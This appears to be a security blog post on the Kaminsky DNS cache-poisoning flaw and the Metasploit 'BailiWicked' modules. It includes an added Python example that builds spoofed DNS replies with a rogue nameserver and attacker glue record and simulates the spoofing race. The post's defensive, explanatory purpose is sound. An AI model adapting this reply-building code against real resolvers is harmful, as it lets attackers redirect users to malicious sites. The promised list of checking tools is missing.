Advanced Threats Researcher Paul Ferguson, along with other security researchers, saw it coming. The code that can exploit a flaw in Domain Name System (DNS) servers—discovered and disclosed by Dan Kaminsky early this month—is confirmed to be in the wild.
Ferguson’s initial report of such code (CNet News had also speculated about it) and the confirmation reported by The Register late last week finally settled the one question that has troubled the security industry since Kaminsky’s discovery: whether working exploit code exists. They also vindicated a threat that many recipients of the news had initially dismissed as “shameless hype.” We now expect people to start taking this seriously.
The Kaminsky DNS cache-poisoning vulnerability lets attackers and phishers insert forged records into a recursive nameserver’s cache, so that every client of that server is silently redirected to addresses of the attacker’s choosing; Kaminsky found this to be the method used by Netdevilz, a Turkish hacker group, when they hijacked Photobucket last month. And just last week, security researchers from the Computer Academic Underground (CAU) and the Metasploit Project released two exploit modules, which both groups have published via their respective blog entries.
Constant reader, meet the BailiWickeds—DNS BailiWicked Host Attack and DNS BailiWicked Domain Attack: brothers in arms.
CAU’s |)ruid (read as “druid”), who wrote most of the exploit code, explains in this blog entry how the pair can turn an unpatched DNS server into a delivery vehicle for online threats. The host attack module is responsible for “injecting individual uncached host records into the target nameserver’s cache”: the attacker gets the target nameserver to look up a hostname it has not cached, then sends it a flood of spoofed reply packets (almost certainly faster than the real authoritative server can respond), each one guessing the transaction ID and source port of the outstanding query. To the target nameserver, which is the querying client here, the attacker is indistinguishable from the legitimate authoritative server, since the spoofed replies carry that server’s address as their source; the first reply whose transaction ID and port match is accepted and cached.
The domain attack module, on the other hand, replaces “a target domain’s nameserver records in a target nameserver’s cache.” Instead of poisoning a single hostname, the spoofed reply uses the authority and additional sections that a normal DNS answer carries to name a new nameserver for the whole domain, together with an address record that points that nameserver at the attacker. Because these records fall inside the domain being queried (they are “in bailiwick,” hence the modules’ name), the target caches them once the source port and transaction ID have been matched. From then on every lookup in that domain goes through the attacker’s server, which can point users to malicious sites at will.
The current BailiWicked modules have been tuned to estimate the “dead air” between the target’s outgoing query packet and the incoming legitimate reply. That window determines how many spoofed replies the exploit can deliver to the target nameserver before the real answer arrives and closes the race.
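To make the mechanics above concrete, here is an added example in Python; it is not code from the original post or from the Metasploit modules it describes. It builds the spoofed reply used by the domain attack (answer, authority NS record and in-bailiwick glue), models the checks an unpatched resolver makes before caching such a reply (transaction ID, port, query name, bailiwick), and simulates the race with and without source-port randomization. The zone `target.example`, the nameserver `ns.target.example`, the attacker address `192.0.2.66` and the fixed query port 53 are assumptions made for the illustration.

```python
# Added example (Python), not code from the original post or from the
# Metasploit modules it describes.  It builds the DNS messages involved in a
# Kaminsky-style poisoning race and models the checks an unpatched resolver
# makes before caching a reply.  Zone, nameserver, IP and port are constructed.
import random
import struct

TARGET_ZONE = "target.example"   # assumed victim zone
ATTACKER_IP = "192.0.2.66"       # assumed attacker host (TEST-NET-1 address)
FIXED_PORT = 53                  # assumed fixed query port of an unpatched resolver
TXID_SPACE = 1 << 16             # 16-bit DNS transaction ID

def encode_name(name):
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def decode_name(msg, off):
    # no compression pointers: we build every message ourselves
    labels = []
    while msg[off] != 0:
        ln = msg[off]
        labels.append(msg[off + 1:off + 1 + ln].decode("ascii"))
        off += 1 + ln
    return ".".join(labels), off + 1

def ip4(addr):
    return bytes(int(o) for o in addr.split("."))

def rr(name, rtype, rdata, ttl=3600):
    # one wire-format resource record, class IN
    return encode_name(name) + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata

def build_spoofed_reply(txid, qname, ns_name, glue_ip):
    # "domain attack" reply: the A answer for the random name is throwaway;
    # the Authority NS record and its Additional glue are what poison the zone
    hdr = struct.pack("!HHHHHH", txid, 0x8400, 1, 1, 1, 1)   # QR | AA
    question = encode_name(qname) + struct.pack("!HH", 1, 1)
    answer = rr(qname, 1, ip4(glue_ip))
    authority = rr(TARGET_ZONE, 2, encode_name(ns_name))
    additional = rr(ns_name, 1, ip4(glue_ip))
    return hdr + question + answer + authority + additional

def parse_reply(msg):
    txid, _flags, _qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    qname, off = decode_name(msg, 12)
    off += 4                                      # skip QTYPE and QCLASS
    records = []
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        for _ in range(count):
            name, off = decode_name(msg, off)
            rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
            rdata = msg[off + 10:off + 10 + rdlen]
            off += 10 + rdlen
            if rtype == 1:
                value = ".".join(str(b) for b in rdata)
            elif rtype == 2:
                value = decode_name(rdata, 0)[0]
            else:
                value = rdata.hex()
            records.append((section, name, rtype, value))
    return txid, qname, records

def in_bailiwick(name, zone):
    return name == zone or name.endswith("." + zone)

def resolver_accepts(outstanding, reply, arrival_port):
    """Model of the unpatched resolver's checks.  outstanding is
    (txid, port, qname) of the query in flight; the reply must hit the same
    TXID, port and name.  Records outside the zone's bailiwick are dropped,
    the rest are returned as the entries the resolver would cache."""
    txid = struct.unpack("!H", reply[:2])[0]
    if (txid, arrival_port) != outstanding[:2]:
        return None
    _, qname, records = parse_reply(reply)
    if qname != outstanding[2]:
        return None
    return [r for r in records if in_bailiwick(r[1], TARGET_ZONE)]

def race(guesses_per_query, random_port, max_rounds=10000, seed=1):
    """Simulate the race: each round the attacker triggers a query for a fresh
    random name and fires guesses_per_query spoofed replies with distinct
    TXIDs.  Returns rounds until one is accepted, or None if max_rounds pass."""
    rng = random.Random(seed)
    for rounds in range(1, max_rounds + 1):
        port = rng.randrange(1024, 65536) if random_port else FIXED_PORT
        txid = rng.randrange(TXID_SPACE)
        qname = "%08x.%s" % (rng.getrandbits(32), TARGET_ZONE)
        # the attacker cannot see the query, so the port is a guess as well
        guess_port = rng.randrange(1024, 65536) if random_port else FIXED_PORT
        for guess in rng.sample(range(TXID_SPACE), guesses_per_query):
            spoofed = build_spoofed_reply(guess, qname, "ns." + TARGET_ZONE, ATTACKER_IP)
            if resolver_accepts((txid, port, qname), spoofed, guess_port) is not None:
                return rounds
    return None

def expected_rounds(guesses_per_query, port_bits):
    # mean rounds until a spoofed reply matches: each guess covers 1/space
    return TXID_SPACE * (1 << port_bits) / guesses_per_query

if __name__ == "__main__":
    print("fixed port, 300 guesses/round:", race(300, False), "rounds;",
          "expected %.0f, vs %.0f with a random port" % (expected_rounds(300, 0), expected_rounds(300, 16)))
```

The simulation shows why the fixed-port case is practical and the patched case is not: with only the 16-bit transaction ID to guess, a few hundred spoofed replies per triggered query win the race in a few hundred rounds, whereas adding roughly 16 bits of source-port entropy multiplies the expected work by tens of thousands. The bailiwick filter in `resolver_accepts` also shows why the glue record must name a host inside the target domain: an out-of-bailiwick address record is discarded, so the resolver would still have to look the new nameserver up honestly.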
We implore our users to check whether their DNS servers are vulnerable to these exploits by using any of the following tools:
And, yes, we could not stress this more: PATCH NOW.